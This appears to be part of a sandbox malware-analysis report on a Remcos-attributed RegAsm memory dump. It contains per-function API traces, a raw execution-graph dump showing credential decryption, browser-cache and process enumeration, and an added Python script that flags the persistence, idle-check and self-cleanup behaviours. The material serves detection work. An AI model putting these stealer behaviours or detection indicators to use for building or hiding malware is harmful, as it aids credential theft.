                                                                        APIs
                                                                        • GetLastInputInfo.USER32(NG), ref: 0041BAF6
                                                                        • GetTickCount.KERNEL32(?,?,?,00415BA3), ref: 0041BAFC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CountInfoInputLastTick
                                                                        • String ID: NG
                                                                        • API String ID: 3478931382-1651712548
                                                                        • Opcode ID: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                        • Instruction ID: 91b37e9d9b7f8f393223e5bf0be67cbbeb1ccf95644ad96dbec1e326022f3834
                                                                        • Opcode Fuzzy Hash: 1072e3c2261f103fc32e137a75d3669dd2f4511b29ca1c5cc6daf9e0edaf2e7e
                                                                        • Instruction Fuzzy Hash: 84D0C97180060CABDB04AFA5EC4D99DBBBCEB05212F1042A5E84992210DA71AA548A95
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                                                        • GetLastError.KERNEL32 ref: 00440D35
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1717984340-0
                                                                        • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                                        • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                                                        • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                                        • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                                                        APIs
                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                                                        • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                                                        • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                                                        • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000E.00000002.620559291.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                        • Associated: 0000000E.00000002.620559291.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLastRead
                                                                        • String ID:
                                                                        • API String ID: 4100373531-0
                                                                        • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                        • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                                                        • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                                        • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
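                                                                        The per-function records above (APIs, String ID, API ID) are what an analyst scans for the behaviours the report's signature list already attributes to this RegAsm dump: the Policies\Explorer\Run persistence key, the GetLastInputInfo/GetTickCount idle check, the DeleteFileW/RemoveDirectoryW cleanup of the "pth_unenc" path, and TerminateProcess followed by WaitForSingleObject. The script below is an added example, not Joe Sandbox code and not part of this report: it parses records in exactly the plain-text layout shown here and flags those combinations. The rule set is this example's own assumption about which API/string pairs correspond to the signatures, and the sample text is a constructed, trimmed copy of four records from this section.

```python
"""Triage of Joe Sandbox per-function records (added example, not Joe
Sandbox code). Parses the plain-text records as shown in this report
(APIs lines plus the 'API ID' / 'String ID' similarity fields) and flags
API+string combinations that line up with behaviours the report's
signatures attribute to Remcos. The RULES mapping is an assumption of
this example, not the sandbox's own signature logic."""
import re
from dataclasses import dataclass, field

# Matches "• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876"
# and the argument-less form "• GetLastError.KERNEL32 ref: 00440D35".
API_RE = re.compile(
    r"^(?:•\s*)?([^.\s]+)\.([A-Z0-9]+)(?:\((.*)\))?,?\s+ref:\s+([0-9A-Fa-f]+)$")
# Only the two similarity fields we use; "API String ID:" deliberately does not match.
FIELD_RE = re.compile(r"^(?:•\s*)?(API ID|String ID):\s*(.*)$")


@dataclass
class FuncRecord:
    apis: list = field(default_factory=list)   # (name, module, args, ref address)
    api_id: str = ""                           # Joe Sandbox "API ID" field
    string_id: str = ""                        # Joe Sandbox "String ID" field

    def names(self):
        return {name for name, _, _, _ in self.apis}

    def strings(self):
        # A string such as pth_unenc shows up both as a call argument and as String ID.
        return {self.string_id} | {a for _, _, args, _ in self.apis for a in args.split(",")}


def parse_records(text):
    """Split report text into records; a new record starts at each bare 'APIs' label."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FuncRecord()
            records.append(cur)
            continue
        m_api, m_field = API_RE.match(line), FIELD_RE.match(line)
        if not (m_api or m_field):
            continue                           # Source File, Opcode ID, etc. are ignored
        if cur is None:                        # similarity fields seen before any 'APIs' label
            cur = FuncRecord()
            records.append(cur)
        if m_api:
            name, module, args, ref = m_api.groups()
            cur.apis.append((name, module, args or "", ref))
        elif m_field.group(1) == "API ID":
            cur.api_id = m_field.group(2)
        else:
            cur.string_id = m_field.group(2)
    return records


# label -> predicate over a FuncRecord (assumed mapping to the report's signatures)
RULES = {
    "persistence key: Policies\\Explorer\\Run":
        lambda r: "Policies\\Explorer\\Run" in r.string_id,
    "idle-time check (GetLastInputInfo+GetTickCount)":
        lambda r: {"GetLastInputInfo", "GetTickCount"} <= r.names(),
    "self-cleanup of dropped path":
        lambda r: {"DeleteFileW", "RemoveDirectoryW"} <= r.names() and "pth_unenc" in r.strings(),
    "kill process and wait for exit":
        lambda r: {"TerminateProcess", "WaitForSingleObject"} <= r.names(),
}


def triage(text):
    """Return [(location, [labels])] for every record that hits at least one rule.
    location is the ref address of the record's first API call, or its API ID
    when the record carries no API lines."""
    hits = []
    for rec in parse_records(text):
        labels = [label for label, pred in RULES.items() if pred(rec)]
        if labels:
            where = rec.apis[0][3] if rec.apis else rec.api_id
            hits.append((where, labels))
    return hits


# Constructed sample: trimmed copies of records from this section of the report.
SAMPLE = """\
• API ID: DeleteOpenValue
• String ID: Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\
APIs
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
• API ID: DeleteDirectoryFileRemove
• String ID: pth_unenc
APIs
• TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
• WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
APIs
• GetLastInputInfo.USER32(NG), ref: 0041BAF6
• GetTickCount.KERNEL32(?,?,?,00415BA3), ref: 0041BAFC
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000), ref: 00440D27
• GetLastError.KERNEL32 ref: 00440D35
"""

if __name__ == "__main__":
    for where, labels in triage(SAMPLE):
        print(where, "->", "; ".join(labels))
```

Running it on the sample flags four of the five records and leaves the MultiByteToWideChar/GetLastError helper alone; the same parser can be pointed at a full report export to pull out the handful of functions worth opening in IDA first.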

                                                                        Execution Graph

                                                                        Execution Coverage: 6%
                                                                        Dynamic/Decrypted Code Coverage: 9.2%
                                                                        Signature Coverage: 0%
                                                                        Total number of Nodes: 2000
                                                                        Total number of Limit Nodes: 66
                                                                        execution_graph: node and edge dump of the interactive execution graph for the RegAsm dump (about 2000 nodes); the rendered graph is not reproducible as text. Recoverable from the dump: the entry node 4466f4 runs CRT start-up (GetModuleHandleA, __set_app_type, __p__fmode, __p__commode, __setusermatherr, _controlfp, _initterm, GetEnvironmentStringsW, GetStartupInfoW) and then calls 41276d, which reaches 4044a4 (LoadLibraryW, FreeLibrary, MessageBoxW), 40a804 (GetSystemDirectoryW, wcscpy, wcscat, LoadLibraryW), 412465 (memset, operator new), 40dd07 / 40db69 (GetModuleFileNameW, GetPrivateProfileStringW, WritePrivateProfileStringW, EnumResourceNamesW, LoadStringW), then CoInitialize, 4123e2 (GetModuleHandleW, RegisterClassW, CreateWindowExW), ShowWindow, UpdateWindow, LoadAcceleratorsW and a GetMessageW / TranslateAcceleratorW / IsDialogMessageW / TranslateMessage / DispatchMessageW message loop that ends in CoUninitialize.
FreeLibrary 38667->38865 38668->38667 38669 4137ac CoTaskMemFree 38668->38669 38669->38668 39229 4449b9 38670->39229 38673 444c1f 38673->38405 38674 4449b9 35 API calls 38676 444b4b 38674->38676 38675 444c15 38678 4449b9 35 API calls 38675->38678 38676->38675 39249 444972 GetVersionExW 38676->39249 38678->38673 38679 444b8c 38680 444b99 memcmp 38679->38680 38681 444c0b 38679->38681 39250 444aa5 35 API calls 38679->39250 39251 40a7a0 GetVersionExW 38679->39251 38680->38679 38687 40399d 38686->38687 39254 403a16 38687->39254 38689 403a09 39268 40b1ab ??3@YAXPAX ??3@YAXPAX 38689->39268 38691 403a12 wcsrchr 38691->38412 38692 4039a3 38692->38689 38695 4039f4 38692->38695 39265 40a02c CreateFileW 38692->39265 38695->38689 38696 4099c6 2 API calls 38695->38696 38696->38689 38698 414c2e 16 API calls 38697->38698 38699 404048 38698->38699 38700 414c2e 16 API calls 38699->38700 38701 404056 38700->38701 38702 409d1f 6 API calls 38701->38702 38703 404073 38702->38703 38704 409d1f 6 API calls 38703->38704 38705 40408e 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 4040a6 38706->38707 38708 403af5 20 API calls 38707->38708 38709 4040ba 38708->38709 38710 403af5 20 API calls 38709->38710 38711 4040cb 38710->38711 39295 40414f memset 38711->39295 38713 404140 39309 40b1ab ??3@YAXPAX ??3@YAXPAX 38713->39309 38715 4040ec memset 38718 4040e0 38715->38718 38716 404148 38716->38472 38717 4099c6 2 API calls 38717->38718 38718->38713 38718->38715 38718->38717 38719 40a8ab 9 API calls 38718->38719 38719->38718 39322 40a6e6 WideCharToMultiByte 38720->39322 38722 4087ed 39323 4095d9 memset 38722->39323 38725 408809 memset memset memset memset memset 38726 40b2cc 27 API calls 38725->38726 38727 4088a1 38726->38727 38728 409d1f 6 API calls 38727->38728 38729 4088b1 38728->38729 38730 40b2cc 27 API calls 38729->38730 38731 4088c0 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 4088d0 38732->38733 38734 40b2cc 27 API calls 38733->38734 38735 4088df 38734->38735 38757 408953 
38757->38472 38772 40b633 ??3@YAXPAX 38771->38772 38773 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38772->38773 38774 413f00 Process32NextW 38773->38774 38775 413da5 OpenProcess 38774->38775 38776 413f17 CloseHandle 38774->38776 38777 413df3 memset 38775->38777 38780 413eb0 38775->38780 38776->38515 39372 413f27 38777->39372 38779 413ebf ??3@YAXPAX 38779->38780 38780->38774 38780->38779 38781 4099f4 3 API calls 38780->38781 38781->38780 38782 413e37 GetModuleHandleW 38784 413e46 38782->38784 38786 413e1f 38782->38786 38784->38786 38785 413e6a QueryFullProcessImageNameW 38785->38786 38786->38782 38786->38785 39377 413959 38786->39377 39393 413ca4 38786->39393 38788 413ea2 CloseHandle 38788->38780 38790 414c2e 16 API calls 38789->38790 38791 403eb7 38790->38791 38792 414c2e 16 API calls 38791->38792 38793 403ec5 38792->38793 38794 409d1f 6 API calls 38793->38794 38795 403ee2 38794->38795 38796 409d1f 6 API calls 38795->38796 38797 403efd 38796->38797 38798 409d1f 6 API calls 38797->38798 38799 403f15 38798->38799 38800 403af5 20 API calls 38799->38800 38801 403f29 38800->38801 38802 403af5 20 API calls 38801->38802 38803 403f3a 38802->38803 38804 40414f 33 API calls 38803->38804 38810 403f4f 38804->38810 38805 403faf 39406 40b1ab ??3@YAXPAX ??3@YAXPAX 38805->39406 38806 403f5b memset 38806->38810 38808 403fb7 38808->38454 38809 4099c6 2 API calls 38809->38810 38810->38805 38810->38806 38810->38809 38811 40a8ab 9 API calls 38810->38811 38811->38810 38813 414c2e 16 API calls 38812->38813 38814 403d26 38813->38814 38815 414c2e 16 API calls 38814->38815 38816 403d34 38815->38816 38817 409d1f 6 API calls 38816->38817 38818 403d51 38817->38818 38819 409d1f 6 API calls 38818->38819 38820 403d6c 38819->38820 38821 409d1f 6 API calls 38820->38821 38822 403d84 38821->38822 38823 403af5 20 API calls 38822->38823 38824 403d98 38823->38824 38825 403af5 20 API calls 38824->38825 38826 403da9 38825->38826 38827 40414f 33 API calls 38826->38827 38833 403dbe 38827->38833 
38828 403e1e 39407 40b1ab ??3@YAXPAX ??3@YAXPAX 38828->39407 38829 403dca memset 38829->38833 38831 403e26 38831->38470 38832 4099c6 2 API calls 38832->38833 38833->38828 38833->38829 38833->38832 38834 40a8ab 9 API calls 38833->38834 38834->38833 38836 414b81 8 API calls 38835->38836 38837 414c40 38836->38837 38838 414c73 memset 38837->38838 39408 409cea 38837->39408 38840 414c94 38838->38840 39411 414592 RegOpenKeyExW 38840->39411 38842 414c64 SHGetSpecialFolderPathW 38844 414d0b 38842->38844 38844->38474 38845 414cc1 38846 414cf4 wcscpy 38845->38846 39412 414bb0 wcscpy 38845->39412 38846->38844 38848 414cd2 39413 4145ac RegQueryValueExW 38848->39413 38850 414ce9 RegCloseKey 38850->38846 38852 409d62 38851->38852 38853 409d43 wcscpy 38851->38853 38856 445389 38852->38856 38854 409719 2 API calls 38853->38854 38855 409d51 wcscat 38854->38855 38855->38852 38857 40ae18 9 API calls 38856->38857 38862 4453c4 38857->38862 38858 40ae51 9 API calls 38858->38862 38859 4453f3 38861 40aebe FindClose 38859->38861 38860 40add4 2 API calls 38860->38862 38863 4453fe 38861->38863 38862->38858 38862->38859 38862->38860 38864 445403 250 API calls 38862->38864 38863->38522 38864->38862 38865->38426 38866->38518 38867->38502 38868->38502 38869->38532 38871 409c89 38870->38871 38871->38557 38872->38586 38874 413d39 38873->38874 38875 413d2f FreeLibrary 38873->38875 38876 40b633 ??3@YAXPAX 38874->38876 38875->38874 38877 413d42 38876->38877 38878 40b633 ??3@YAXPAX 38877->38878 38879 413d4a 38878->38879 38879->38548 38880->38455 38881->38462 38882->38484 38884 44db70 38883->38884 38885 40b6fc memset 38884->38885 38886 409c70 2 API calls 38885->38886 38887 40b732 wcsrchr 38886->38887 38888 40b743 38887->38888 38889 40b746 memset 38887->38889 38888->38889 38890 40b2cc 27 API calls 38889->38890 38891 40b76f 38890->38891 38892 409d1f 6 API calls 38891->38892 38893 40b783 38892->38893 39414 409b98 GetFileAttributesW 38893->39414 38895 40b792 38897 409c70 2 API calls 38895->38897 38909 
40b7c2 38895->38909 38899 40b7a5 38897->38899 38902 40b2cc 27 API calls 38899->38902 38900 40b837 CloseHandle 38904 40b83e memset 38900->38904 38901 40b817 39518 409a45 GetTempPathW 38901->39518 38905 40b7b2 38902->38905 39448 40a6e6 WideCharToMultiByte 38904->39448 38906 409d1f 6 API calls 38905->38906 38906->38909 38907 40b827 38907->38904 39415 40bb98 38909->39415 38910 40b866 39449 444432 38910->39449 38913 40bad5 38916 40b04b ??3@YAXPAX 38913->38916 38914 40b273 27 API calls 38915 40b89a 38914->38915 39495 438552 38915->39495 38918 40baf3 38916->38918 38918->38495 38920 40bacd 39498 443d90 38920->39498 38923 40bac6 39548 424f26 122 API calls 38923->39548 38924 40b8bd memset 39539 425413 17 API calls 38924->39539 38927 425413 17 API calls 38945 40b8b8 38927->38945 38930 40a71b MultiByteToWideChar 38930->38945 38931 40a734 MultiByteToWideChar 38931->38945 38934 40b9b5 memcmp 38934->38945 38935 4099c6 2 API calls 38935->38945 38936 404423 37 API calls 38936->38945 38939 4251c4 136 API calls 38939->38945 38940 40bb3e memset memcpy 39549 40a734 MultiByteToWideChar 38940->39549 38942 40bb88 LocalFree 38942->38945 38945->38923 38945->38924 38945->38927 38945->38930 38945->38931 38945->38934 38945->38935 38945->38936 38945->38939 38945->38940 38946 40ba5f memcmp 38945->38946 39540 4253ef 16 API calls 38945->39540 39541 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38945->39541 39542 4253af 17 API calls 38945->39542 39543 4253cf 17 API calls 38945->39543 39544 447280 memset 38945->39544 39545 447960 memset memcpy memcpy memcpy 38945->39545 39546 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38945->39546 39547 447920 memcpy memcpy memcpy 38945->39547 38946->38945 38947->38497 38949 40aebe FindClose 38948->38949 38950 40ae21 38949->38950 38951 4099c6 2 API calls 38950->38951 38952 40ae35 38951->38952 38953 409d1f 6 API calls 38952->38953 38954 40ae49 38953->38954 38954->38561 38956 40ade0 38955->38956 38959 40ae0f 38955->38959 38957 40ade7 wcscmp 38956->38957 38956->38959 
38958 40adfe wcscmp 38957->38958 38957->38959 38958->38959 38959->38561 38961 40ae7b FindNextFileW 38960->38961 38962 40ae5c FindFirstFileW 38960->38962 38963 40ae94 38961->38963 38964 40ae8f 38961->38964 38962->38963 38966 40aeb6 38963->38966 38967 409d1f 6 API calls 38963->38967 38965 40aebe FindClose 38964->38965 38965->38963 38966->38561 38967->38966 38969 40aed1 38968->38969 38970 40aec7 FindClose 38968->38970 38969->38423 38970->38969 38972 4099d7 38971->38972 38973 4099da memcpy 38971->38973 38972->38973 38973->38480 38975 40b2cc 27 API calls 38974->38975 38976 44543f 38975->38976 38977 409d1f 6 API calls 38976->38977 38978 44544f 38977->38978 39943 409b98 GetFileAttributesW 38978->39943 38980 44545e 38981 445476 38980->38981 38982 40b6ef 249 API calls 38980->38982 38983 40b2cc 27 API calls 38981->38983 38982->38981 38984 445482 38983->38984 38985 409d1f 6 API calls 38984->38985 38986 445492 38985->38986 39944 409b98 GetFileAttributesW 38986->39944 38988 4454a1 38989 4454b9 38988->38989 38990 40b6ef 249 API calls 38988->38990 38989->38500 38990->38989 38991->38499 38992->38523 38993->38529 38994->38564 38995->38544 38996->38592 38997->38592 38998->38575 38999->38605 39000->38607 39001->38609 39003 414c2e 16 API calls 39002->39003 39004 40c2ae 39003->39004 39060 40c1d3 39004->39060 39009 40c3be 39026 40a8ab 39009->39026 39010 40afcf 2 API calls 39011 40c2fd FindFirstUrlCacheEntryW 39010->39011 39012 40c3b6 39011->39012 39013 40c31e wcschr 39011->39013 39014 40b04b ??3@YAXPAX 39012->39014 39015 40c331 39013->39015 39016 40c35e FindNextUrlCacheEntryW 39013->39016 39014->39009 39018 40a8ab 9 API calls 39015->39018 39016->39013 39017 40c373 GetLastError 39016->39017 39019 40c3ad FindCloseUrlCache 39017->39019 39020 40c37e 39017->39020 39021 40c33e wcschr 39018->39021 39019->39012 39022 40afcf 2 API calls 39020->39022 39021->39016 39023 40c34f 39021->39023 39024 40c391 FindNextUrlCacheEntryW 39022->39024 39025 40a8ab 9 API calls 39023->39025 39024->39013 
39024->39019 39025->39016 39154 40a97a 39026->39154 39029 40a8cc 39029->38616 39030 40a8d0 7 API calls 39030->39029 39159 40b1ab ??3@YAXPAX ??3@YAXPAX 39031->39159 39033 40c3dd 39034 40b2cc 27 API calls 39033->39034 39035 40c3e7 39034->39035 39160 414592 RegOpenKeyExW 39035->39160 39037 40c3f4 39038 40c50e 39037->39038 39039 40c3ff 39037->39039 39053 405337 39038->39053 39040 40a9ce 4 API calls 39039->39040 39041 40c418 memset 39040->39041 39161 40aa1d 39041->39161 39044 40c471 39046 40c47a _wcsupr 39044->39046 39045 40c505 RegCloseKey 39045->39038 39047 40a8d0 7 API calls 39046->39047 39048 40c498 39047->39048 39049 40a8d0 7 API calls 39048->39049 39050 40c4ac memset 39049->39050 39051 40aa1d 39050->39051 39052 40c4e4 RegEnumValueW 39051->39052 39052->39045 39052->39046 39163 405220 39053->39163 39055 405340 39055->38630 39056->38627 39057->38629 39058->38630 39059->38623 39061 40ae18 9 API calls 39060->39061 39067 40c210 39061->39067 39062 40ae51 9 API calls 39062->39067 39063 40c264 39064 40aebe FindClose 39063->39064 39066 40c26f 39064->39066 39065 40add4 2 API calls 39065->39067 39072 40e5ed memset memset 39066->39072 39067->39062 39067->39063 39067->39065 39068 40c231 _wcsicmp 39067->39068 39069 40c1d3 34 API calls 39067->39069 39068->39067 39070 40c248 39068->39070 39069->39067 39085 40c084 21 API calls 39070->39085 39073 414c2e 16 API calls 39072->39073 39074 40e63f 39073->39074 39075 409d1f 6 API calls 39074->39075 39076 40e658 39075->39076 39086 409b98 GetFileAttributesW 39076->39086 39078 40e667 39079 409d1f 6 API calls 39078->39079 39081 40e680 39078->39081 39079->39081 39087 409b98 GetFileAttributesW 39081->39087 39082 40e68f 39083 40c2d8 39082->39083 39088 40e4b2 39082->39088 39083->39009 39083->39010 39085->39067 39086->39078 39087->39082 39109 40e01e 39088->39109 39090 40e593 39091 40e5b0 39090->39091 39092 40e59c DeleteFileW 39090->39092 39093 40b04b ??3@YAXPAX 39091->39093 39092->39091 39095 40e5bb 39093->39095 39094 40e521 39094->39090 39132 
40e175 39094->39132 39097 40e5c4 CloseHandle 39095->39097 39098 40e5cc 39095->39098 39097->39098 39101 40b633 ??3@YAXPAX 39098->39101 39099 40e540 39100 40e573 39099->39100 39152 40e2ab 30 API calls 39099->39152 39102 40e584 39100->39102 39103 40e57c CloseHandle 39100->39103 39104 40e5db 39101->39104 39153 40b1ab ??3@YAXPAX ??3@YAXPAX 39102->39153 39103->39102 39105 40b633 ??3@YAXPAX 39104->39105 39107 40e5e3 39105->39107 39107->39083 39110 406214 22 API calls 39109->39110 39111 40e03c 39110->39111 39112 40e16b 39111->39112 39113 40dd85 60 API calls 39111->39113 39112->39094 39114 40e06b 39113->39114 39114->39112 39115 40afcf ??2@YAPAXI ??3@YAXPAX 39114->39115 39116 40e08d OpenProcess 39115->39116 39117 40e0a4 GetCurrentProcess DuplicateHandle 39116->39117 39121 40e152 39116->39121 39118 40e0d0 GetFileSize 39117->39118 39119 40e14a CloseHandle 39117->39119 39122 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39118->39122 39119->39121 39120 40e160 39124 40b04b ??3@YAXPAX 39120->39124 39121->39120 39123 406214 22 API calls 39121->39123 39125 40e0ea 39122->39125 39123->39120 39124->39112 39126 4096dc CreateFileW 39125->39126 39127 40e0f1 CreateFileMappingW 39126->39127 39128 40e140 CloseHandle CloseHandle 39127->39128 39129 40e10b MapViewOfFile 39127->39129 39128->39119 39130 40e13b CloseHandle 39129->39130 39131 40e11f WriteFile UnmapViewOfFile 39129->39131 39130->39128 39131->39130 39133 40e18c 39132->39133 39134 406b90 11 API calls 39133->39134 39135 40e19f 39134->39135 39136 40e1a7 memset 39135->39136 39137 40e299 39135->39137 39143 40e1e8 39136->39143 39138 4069a3 ??3@YAXPAX ??3@YAXPAX 39137->39138 39139 40e2a4 39138->39139 39139->39099 39140 406e8f 13 API calls 39140->39143 39141 406b53 SetFilePointerEx ReadFile 39141->39143 39142 40dd50 _wcsicmp 39142->39143 39143->39140 39143->39141 39143->39142 39144 40e283 39143->39144 39148 40742e 8 API calls 39143->39148 39149 40aae3 wcslen wcslen _memicmp 39143->39149 39150 40e244 _snwprintf 39143->39150 39145 
40e291 39144->39145 39146 40e288 ??3@YAXPAX 39144->39146 39147 40aa04 ??3@YAXPAX 39145->39147 39146->39145 39147->39137 39148->39143 39149->39143 39151 40a8d0 7 API calls 39150->39151 39151->39143 39152->39099 39153->39090 39156 40a980 39154->39156 39155 40a8bb 39155->39029 39155->39030 39156->39155 39157 40a995 _wcsicmp 39156->39157 39158 40a99c wcscmp 39156->39158 39157->39156 39158->39156 39159->39033 39160->39037 39162 40aa23 RegEnumValueW 39161->39162 39162->39044 39162->39045 39164 40522a 39163->39164 39189 405329 39163->39189 39165 40b2cc 27 API calls 39164->39165 39166 405234 39165->39166 39167 40a804 8 API calls 39166->39167 39168 40523a 39167->39168 39190 40b273 39168->39190 39170 405248 _mbscpy _mbscat 39171 40526c 39170->39171 39172 40b273 27 API calls 39171->39172 39173 405279 39172->39173 39174 40b273 27 API calls 39173->39174 39175 40528f 39174->39175 39176 40b273 27 API calls 39175->39176 39177 4052a5 39176->39177 39178 40b273 27 API calls 39177->39178 39179 4052bb 39178->39179 39180 40b273 27 API calls 39179->39180 39181 4052d1 39180->39181 39182 40b273 27 API calls 39181->39182 39183 4052e7 39182->39183 39184 40b273 27 API calls 39183->39184 39185 4052fd 39184->39185 39186 40b273 27 API calls 39185->39186 39187 405313 39186->39187 39188 40b273 27 API calls 39187->39188 39188->39189 39189->39055 39191 40b58d 27 API calls 39190->39191 39192 40b18c 39191->39192 39192->39170 39194 40440c FreeLibrary 39193->39194 39195 40436d 39194->39195 39196 40a804 8 API calls 39195->39196 39197 404377 39196->39197 39198 4043f7 39197->39198 39199 40b273 27 API calls 39197->39199 39198->38637 39198->38639 39200 40438d 39199->39200 39201 40b273 27 API calls 39200->39201 39202 4043a7 39201->39202 39203 40b273 27 API calls 39202->39203 39204 4043ba 39203->39204 39205 40b273 27 API calls 39204->39205 39206 4043ce 39205->39206 39207 40b273 27 API calls 39206->39207 39208 4043e2 39207->39208 39208->39198 39209 40440c FreeLibrary 39208->39209 39209->39198 39211 404413 
FreeLibrary 39210->39211 39212 40441e 39210->39212 39211->39212 39212->38650 39213->38647 39215 40447e 39214->39215 39216 40442e 39214->39216 39217 404485 CryptUnprotectData 39215->39217 39218 40449c 39215->39218 39219 40b2cc 27 API calls 39216->39219 39217->39218 39218->38647 39220 404438 39219->39220 39221 40a804 8 API calls 39220->39221 39222 40443e 39221->39222 39223 40444f 39222->39223 39224 40b273 27 API calls 39222->39224 39223->39215 39225 404475 FreeLibrary 39223->39225 39224->39223 39225->39215 39227 4135f6 39226->39227 39228 4135eb FreeLibrary 39226->39228 39227->38653 39228->39227 39230 4449c4 39229->39230 39248 444a48 39229->39248 39231 40b2cc 27 API calls 39230->39231 39232 4449cb 39231->39232 39233 40a804 8 API calls 39232->39233 39234 4449d1 39233->39234 39235 40b273 27 API calls 39234->39235 39248->38673 39248->38674 39249->38679 39250->38679 39251->38679 39255 403a29 39254->39255 39269 403bed memset memset 39255->39269 39257 403ae7 39282 40b1ab ??3@YAXPAX ??3@YAXPAX 39257->39282 39258 403a3f memset 39261 403a2f 39258->39261 39260 403aef 39260->38692 39261->39257 39261->39258 39262 409d1f 6 API calls 39261->39262 39263 409b98 GetFileAttributesW 39261->39263 39264 40a8d0 7 API calls 39261->39264 39262->39261 39263->39261 39264->39261 39266 40a051 GetFileTime CloseHandle 39265->39266 39267 4039ca CompareFileTime 39265->39267 39266->39267 39267->38692 39268->38691 39270 414c2e 16 API calls 39269->39270 39271 403c38 39270->39271 39272 409719 2 API calls 39271->39272 39273 403c3f wcscat 39272->39273 39274 414c2e 16 API calls 39273->39274 39275 403c61 39274->39275 39276 409719 2 API calls 39275->39276 39277 403c68 wcscat 39276->39277 39283 403af5 39277->39283 39280 403af5 20 API calls 39281 403c95 39280->39281 39281->39261 39282->39260 39284 403b02 39283->39284 39285 40ae18 9 API calls 39284->39285 39293 403b37 39285->39293 39286 403bdb 39288 40aebe FindClose 39286->39288 39287 40add4 wcscmp wcscmp 39287->39293 39289 403be6 39288->39289 39289->39280 
39290 40ae18 9 API calls 39290->39293 39291 40ae51 9 API calls 39291->39293 39292 40aebe FindClose 39292->39293 39293->39286 39293->39287 39293->39290 39293->39291 39293->39292 39294 40a8d0 7 API calls 39293->39294 39294->39293 39296 409d1f 6 API calls 39295->39296 39297 404190 39296->39297 39310 409b98 GetFileAttributesW 39297->39310 39299 40419c 39300 4041a7 6 API calls 39299->39300 39301 40435c 39299->39301 39302 40424f 39300->39302 39301->38718 39302->39301 39304 40425e memset 39302->39304 39306 409d1f 6 API calls 39302->39306 39307 40a8ab 9 API calls 39302->39307 39311 414842 39302->39311 39304->39302 39305 404296 wcscpy 39304->39305 39305->39302 39306->39302 39308 4042b6 memset memset _snwprintf wcscpy 39307->39308 39308->39302 39309->38716 39310->39299 39314 41443e 39311->39314 39313 414866 39313->39302 39315 41444b 39314->39315 39316 414451 39315->39316 39317 4144a3 GetPrivateProfileStringW 39315->39317 39318 414491 39316->39318 39319 414455 wcschr 39316->39319 39317->39313 39321 414495 WritePrivateProfileStringW 39318->39321 39319->39318 39320 414463 _snwprintf 39319->39320 39320->39321 39321->39313 39322->38722 39324 40b2cc 27 API calls 39323->39324 39325 409615 39324->39325 39326 409d1f 6 API calls 39325->39326 39327 409625 39326->39327 39350 409b98 GetFileAttributesW 